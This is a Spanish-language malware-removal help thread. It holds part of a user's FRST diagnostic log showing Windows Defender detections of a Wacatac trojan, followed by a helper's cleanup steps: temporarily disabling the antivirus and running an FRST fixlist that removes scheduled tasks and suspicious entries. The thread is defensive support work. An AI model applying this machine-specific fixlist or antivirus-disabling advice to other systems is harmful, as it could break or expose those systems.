ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-12-23] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2016-12-15] (VS Revo Group -> VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [VIDC.RTV1] => C:\Windows\system32\rtvcvfw64.dll [246272 2012-09-28] () [File not signed]
HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\system32\ficvdec_x64.dll [652288 2013-05-28] () [File not signed]
HKLM\...\Drivers32: [VIDC.RTV1] => C:\Windows\SysWOW64\rtvcvfw32.dll [247296 2012-09-28] () [File not signed]
HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\SysWOW64\ficvdec_x86.dll [641024 2013-05-28] () [File not signed]

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\saenz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Authy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) ->  --profile-directory=Default --app-id=gaedmjdfmmahhbjefcbgaolhhanlaolb
ShortcutWithArgument: C:\Users\saenz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Escritorio Remoto de Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) ->  --profile-directory=Default --app-id=gbchcmhmhahfdphkhkmpfmihenigjmpp

==================== Loaded Modules (Whitelisted) =============

2019-07-25 17:27 - 2014-12-10 11:25 - 000087552 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\_ctypes.pyd
2019-07-25 17:27 - 2014-12-10 11:25 - 000774656 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\_hashlib.pyd
2019-07-25 17:27 - 2014-12-10 11:25 - 000046080 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\_socket.pyd
2019-07-25 17:27 - 2014-12-10 11:25 - 001201152 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\_ssl.pyd
2019-07-25 17:27 - 2014-05-03 11:55 - 000110080 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\pywintypes27.dll
2019-07-25 17:27 - 2014-05-03 11:56 - 000027648 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\servicemanager.pyd
2019-07-25 17:27 - 2014-05-03 11:56 - 000100352 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32api.pyd
2019-07-25 17:27 - 2014-05-03 11:55 - 000018432 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32event.pyd
2019-07-25 17:27 - 2014-05-03 11:56 - 000049664 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32evtlog.pyd
2019-07-25 17:27 - 2014-05-03 11:55 - 000119808 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32file.pyd
2019-07-25 17:27 - 2014-05-03 11:55 - 000024064 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32pipe.pyd
2019-07-25 17:27 - 2014-05-03 11:55 - 000036864 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32process.pyd
2019-07-25 17:27 - 2014-05-03 11:55 - 000108544 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32security.pyd
2019-07-25 17:27 - 2014-05-03 11:55 - 000042496 _____ () [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\win32service.pyd
2019-06-08 12:39 - 2014-05-16 00:35 - 000192512 _____ () [File not signed] C:\Program Files\BLUE\Yeti_Pro_Driver\blueyetiproapi.dll
2018-10-05 01:13 - 2018-10-05 01:13 - 000144896 _____ () [File not signed] C:\Program Files\Logitech Gaming Software\LAClient\libssh2.dll
2018-10-05 01:13 - 2018-10-05 01:13 - 000077824 _____ () [File not signed] C:\Program Files\Logitech Gaming Software\LAClient\zlib.dll
2019-07-25 17:27 - 2014-12-10 11:25 - 002459136 _____ (Python Software Foundation) [File not signed] C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\PYTHON27.DLL
2019-04-19 17:00 - 2017-05-23 13:59 - 000494080 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.dll
2019-04-19 17:00 - 2017-05-23 13:59 - 000256000 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\uploader.dll
2018-10-05 01:13 - 2018-10-05 01:13 - 000355840 _____ (The cURL library, hxxp://curl.haxx.se/) [File not signed] C:\Program Files\Logitech Gaming Software\LAClient\LIBCURL.dll
2018-10-05 01:13 - 2018-10-05 01:13 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\LAClient\LIBEAY32.dll
2018-10-05 01:13 - 2018-10-05 01:13 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\LAClient\SSLEAY32.dll
2018-04-06 11:29 - 2018-04-06 11:29 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\LIBEAY32.dll
2018-04-06 11:29 - 2018-04-06 11:29 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\ssleay32.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [442]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2018-09-15 00:31 - 2019-09-05 13:33 - 000001479 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1       licensing.freegrabapp.com
127.0.0.1 api.bignox.com
127.0.0.1 tracking.trnox.com
127.0.0.1 bi.yeshen.com
127.0.0.1 launcher.us.yeshen.com
127.0.0.1 pubstatus.sinaapp.com
127.0.0.1 noxagile.duapp.com
127.0.0.1 common.duapps.com
127.0.0.1 pasta.esfile.duapps.com
127.0.0.1 api.mobula.sdk.duapps.com
127.0.0.1 hmma.baidu.com
127.0.0.1 nrc.tapas.net
127.0.0.1 au.umeng.com
127.0.0.1 www.yeshen.com
127.0.0.1 www.yeshen.com.w.kunlungr.com
127.0.0.1 hm.e.shifen.com
127.0.0.1 tdcv3.talkingdata.net
127.0.0.1 alog.umeng.com
127.0.0.1 sdk.open.inc2.igexin.com
127.0.0.1 androiden.duapp.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Intel\Shared Libraries\redist\intel64\compiler;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\HP\Common\HPDestPlgIn\;C:\Program Files (x86)\Wolfram Research\WolframScript\;C:\Program Files\PuTTY\;C:\Program Files\Calibre2\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851336\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851352\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\saenz\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{a34d7e13-40ba-49d6-abac-ae28cd5d87ca}.jpg
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\Control Panel\Desktop\\Wallpaper -> C:\Users\saenz\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{a34d7e13-40ba-49d6-abac-ae28cd5d87ca}.jpg
DNS Servers: 1.1.1.1 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

Network Binding:
=============
Ethernet 3: Npcap Packet Driver (NPCAP) -> INSECURE_NPCAP (enabled) 
Ethernet: Npcap Packet Driver (NPCAP) -> INSECURE_NPCAP (enabled) 

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\StartupApproved\Run: => "Discord"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Restore Points =========================

06-12-2019 07:25:00 Punto de control programado
15-12-2019 11:04:38 Punto de control programado
24-12-2019 13:14:18 Instalador de Módulos de Windows

==================== Faulty Device Manager Devices ============

Name: Teclado PS/2 estándar
Description: Teclado PS/2 estándar
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Teclados estándar)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Mouse PS/2 de Microsoft
Description: Mouse PS/2 de Microsoft
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: ========================

Application errors:
==================
Error: (12/24/2019 10:25:19 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (14896,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (12/24/2019 10:04:09 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (15232,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (12/24/2019 09:55:03 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (11092,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (12/24/2019 09:45:16 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (15556,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (12/24/2019 06:02:16 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (12732,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (12/24/2019 05:37:41 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (4528,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (12/24/2019 05:07:03 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (7024,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (12/24/2019 04:58:11 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina CoCreateInstance. HR = 0x8007045b, Se está cerrando el sistema.
.


System errors:
=============
Error: (12/24/2019 05:00:07 PM) (Source: DCOM) (EventID: 10001) (User: DESKTOP-1DF3CRC)
Description: No se puede iniciar un servidor DCOM: AdobeNotificationClient_1.0.1.22_x86__enpm4xejd91yc!App.AppXqpex5tm0c07wf9dx3gww6zdf2gfseeyd.mca como No disponible/No disponible. Error 
"2147958031"
al iniciar este comando:
"C:\Program Files\WindowsApps\AdobeNotificationClient_1.0.1.22_x86__enpm4xejd91yc\AdobeNotificationClient.exe" -ServerName:App.AppXbdz14xebceycqvrazxqtnx89wn9e0ebz.mca

Error: (12/24/2019 04:58:40 PM) (Source: Application Popup) (EventID: 56) (User: )
Description: ACPI5

Error: (12/24/2019 04:58:14 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de uso compartido de red del Reproductor de Windows Media depende del servicio Windows Search, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio debido a un error en el inicio de sesión.

Error: (12/24/2019 04:58:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Windows Search no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio debido a un error en el inicio de sesión.

Error: (12/24/2019 04:58:14 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: El servicio WSearch no se pudo iniciarse como NT AUTHORITY\SYSTEM con la contraseña configurada actualmente debido al siguiente error: 
Solicitud no compatible.


Para asegurarte de que el servicio esté correctamente configurado, usa el complemento Servicios en Microsoft Management Console (MMC).

Error: (12/24/2019 04:57:44 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio Servicio del iPod se terminó de manera inesperada. Esto ha sucedido 1 veces.

Error: (12/24/2019 04:57:44 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio Intel(R) Dynamic Application Loader Host Interface Service se terminó de manera inesperada. Esto ha sucedido 1 veces.

Error: (12/24/2019 04:57:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Servicio de uso compartido de red del Reproductor de Windows Media terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 30000 milisegundos: Reiniciar el servicio.


Windows Defender:
===================================
Date: 2019-12-24 11:58:49.309
Description: 
El examen de Antivirus de Windows Defender se detuvo antes de completarse.
Id. de examen: {B96A3CFD-EA8C-44AE-AC38-DD00887E7CB3}
Tipo de examen: Antimalware
Parámetros de examen: Examen rápido
Usuario: NT AUTHORITY\SYSTEM

Date: 2019-12-19 19:17:13.489
Description: 
El examen de Antivirus de Windows Defender se detuvo antes de completarse.
Id. de examen: {E9A6BF54-76F6-4024-8433-236AB54326B0}
Tipo de examen: Antimalware
Parámetros de examen: Examen rápido
Usuario: NT AUTHORITY\SYSTEM

Date: 2019-12-12 11:16:00.438
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.B!ml&threatid=2147735505&enterprise=0
Nombre: Trojan:Win32/Wacatac.B!ml
Id.: 2147735505
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_H:\YBVre\HaciendaIdRfc.exe; process:_pid:6880,ProcessStart:132206480046319308
Origen de detección: Equipo local
Tipo de detección: FastPath
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.307.338.0, AS: 1.307.338.0, NIS: 1.307.338.0
Versión de motor: AM: 1.1.16600.7, NIS: 1.1.16600.7

Date: 2019-12-12 11:15:35.726
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.B!ml&threatid=2147735505&enterprise=0
Nombre: Trojan:Win32/Wacatac.B!ml
Id.: 2147735505
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_H:\YBVre\HaciendaIdRfc.exe; process:_pid:6880,ProcessStart:132206480046319308
Origen de detección: Equipo local
Tipo de detección: FastPath
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.307.338.0, AS: 1.307.338.0, NIS: 1.307.338.0
Versión de motor: AM: 1.1.16600.7, NIS: 1.1.16600.7

Date: 2019-11-25 10:06:44.519
Description: 
El examen de Antivirus de Windows Defender se detuvo antes de completarse.
Id. de examen: {2ADF5FA6-8E15-4626-9DF0-CE83AF94474C}
Tipo de examen: Antimalware
Parámetros de examen: Examen rápido
Usuario: NT AUTHORITY\SYSTEM

Date: 2019-12-12 11:15:59.750
Description: 
Antivirus de Windows Defender encontró un error crítico al realizar una acción en malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Wacatac.B!ml&threatid=2147735505&enterprise=0
Nombre: Trojan:Win32/Wacatac.B!ml
Id.: 2147735505
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_H:\YBVre\HaciendaIdRfc.exe; process:_pid:6880,ProcessStart:132206480046319308
Origen de detección: Equipo local
Tipo de detección: FastPath
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Acción: Cuarentena
Estado de acción:  No additional actions required
Código de error: 0x80070020
Descripción del error: El proceso no tiene acceso al archivo porque está siendo utilizado por otro proceso. 
Versión de inteligencia de seguridad: AV: 1.307.338.0, AS: 1.307.338.0, NIS: 1.307.338.0
Versión del motor: AM: 1.1.16600.7, NIS: 1.1.16600.7

CodeIntegrity:
===================================

Date: 2019-12-24 22:14:49.209
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

Date: 2019-12-24 22:14:47.120
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

Date: 2019-12-24 22:14:46.914
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

Date: 2019-12-24 22:14:45.500
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

Date: 2019-12-24 22:14:45.483
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

Date: 2019-12-24 22:14:45.471
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

Date: 2019-12-24 22:14:45.399
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

Date: 2019-12-24 22:14:45.362
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.

==================== Memory info =========================== 

BIOS: American Megatrends Inc. F1 08/14/2015
Motherboard: Gigabyte Technology Co., Ltd. G1.SNIPER B7-CF
Processor: Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz
Percentage of memory in use: 48%
Total physical RAM: 16336.43 MB
Available physical RAM: 8437.48 MB
Total Virtual: 18768.43 MB
Available Virtual: 10247.81 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.16 GB) (Free:324.22 GB) NTFS
Drive e: (Reservado para el sistema) (Fixed) (Total:0.61 GB) (Free:0.28 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (Barracuda) (Fixed) (Total:3725.9 GB) (Free:1593.35 GB) NTFS
Drive g: () (Fixed) (Total:110.32 GB) (Free:4.24 GB) NTFS

\\?\Volume{43e8b3ac-1018-4463-b0c8-27fd549043da}\ () (Fixed) (Total:0.49 GB) (Free:0.04 GB) NTFS
\\?\Volume{dc16659e-0000-0000-0000-60bb1b000000}\ () (Fixed) (Total:0.86 GB) (Free:0.45 GB) NTFS
\\?\Volume{2bebbf52-db2a-4f64-a08c-7b8c7f272875}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 465.8 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 3726 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: DC16659E)
Partition 1: (Active) - (Size=620 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=110.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=882 MB) - (Type=27)

==================== End of Addition.txt =======================
7

Subí el archivo infectado en cuestion a un sitio que hace pruebas de sus efectos en un sandbox y recopila lo que hace, https://any.run/report/f7d507af865edf961a16f7736f05dd06657e19134391d2c1c762c0ca7ab353ab/97c2ad2b-a602-4175-bf6f-61dfe8d3b3aa

Tengo miedo de saber que tanto logró hacer en mi pc, espero los datos le sean útiles, si es necesario puedo enviar el archivo. Saludos.

8

Hola @BigElros

Paso 1:

Subí el archivo pero a VirusTotal, te dejo su Manual.

Paso 2:

Desinstala con Revo Uninstaller en su Modo Avanzado:

  • Skillbrains

Manual de Revo Uninstaller.

Paso 3:

Ejecutaste FRST desde un lugar incorrecto:

  • Running from C:\Users\saenz\ Desktop

Corta el ejecutable y pegalo en tu escritorio <<< Esto es Muy Importante.

Paso 4:

Sigue estos pasos:

1.- Muy Importante >>> Realizar una copia de Seguridad de su Registro.

  • Descarga DelFix en el escritorio de Windows.
  • Clic Derecho, “Ejecutar como Administrador”.
  • En la ventana principal, marca solamente la casilla “Create Registry Backup”.
  • Clic en Run.

Al terminar se abrirá un reporte llamado DelFix.txt, guárdelo por si fuera necesario y cierre la herramienta…

2.- Desactiva Temporalmente tu antivirus.

3.- Abre un nuevo archivo Notepad/Bloc de Notas y copia y pega este contenido:

Start
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Task: {292105C6-EC0D-4A19-932D-8D8604EF176C} - System32\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {FC10929C-B757-4C0F-A4FE-4443A9CE04E6} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: C:\WINDOWS\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
C:\Program Files (x86)\Skillbrains
Tcpip\..\Interfaces\{2eeec63d-7fe8-4fbd-a8e2-26851ad9ee3f}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{baefaf9a-b4f0-4337-a344-32635598252e}: [DhcpNameServer] 10.10.8.1
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\bd_js_config.js [2019-11-30] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\bd_config.cfg [2019-11-30] <==== ATTENTION
S3 WinRing0_1_2_0; \??\C:\Users\saenz\AppData\Local\Temp\tmp53A7.tmp [X] <==== ATTENTION
C:\Users\saenz\AppData\Local\Temp\tmp53A7.tmp
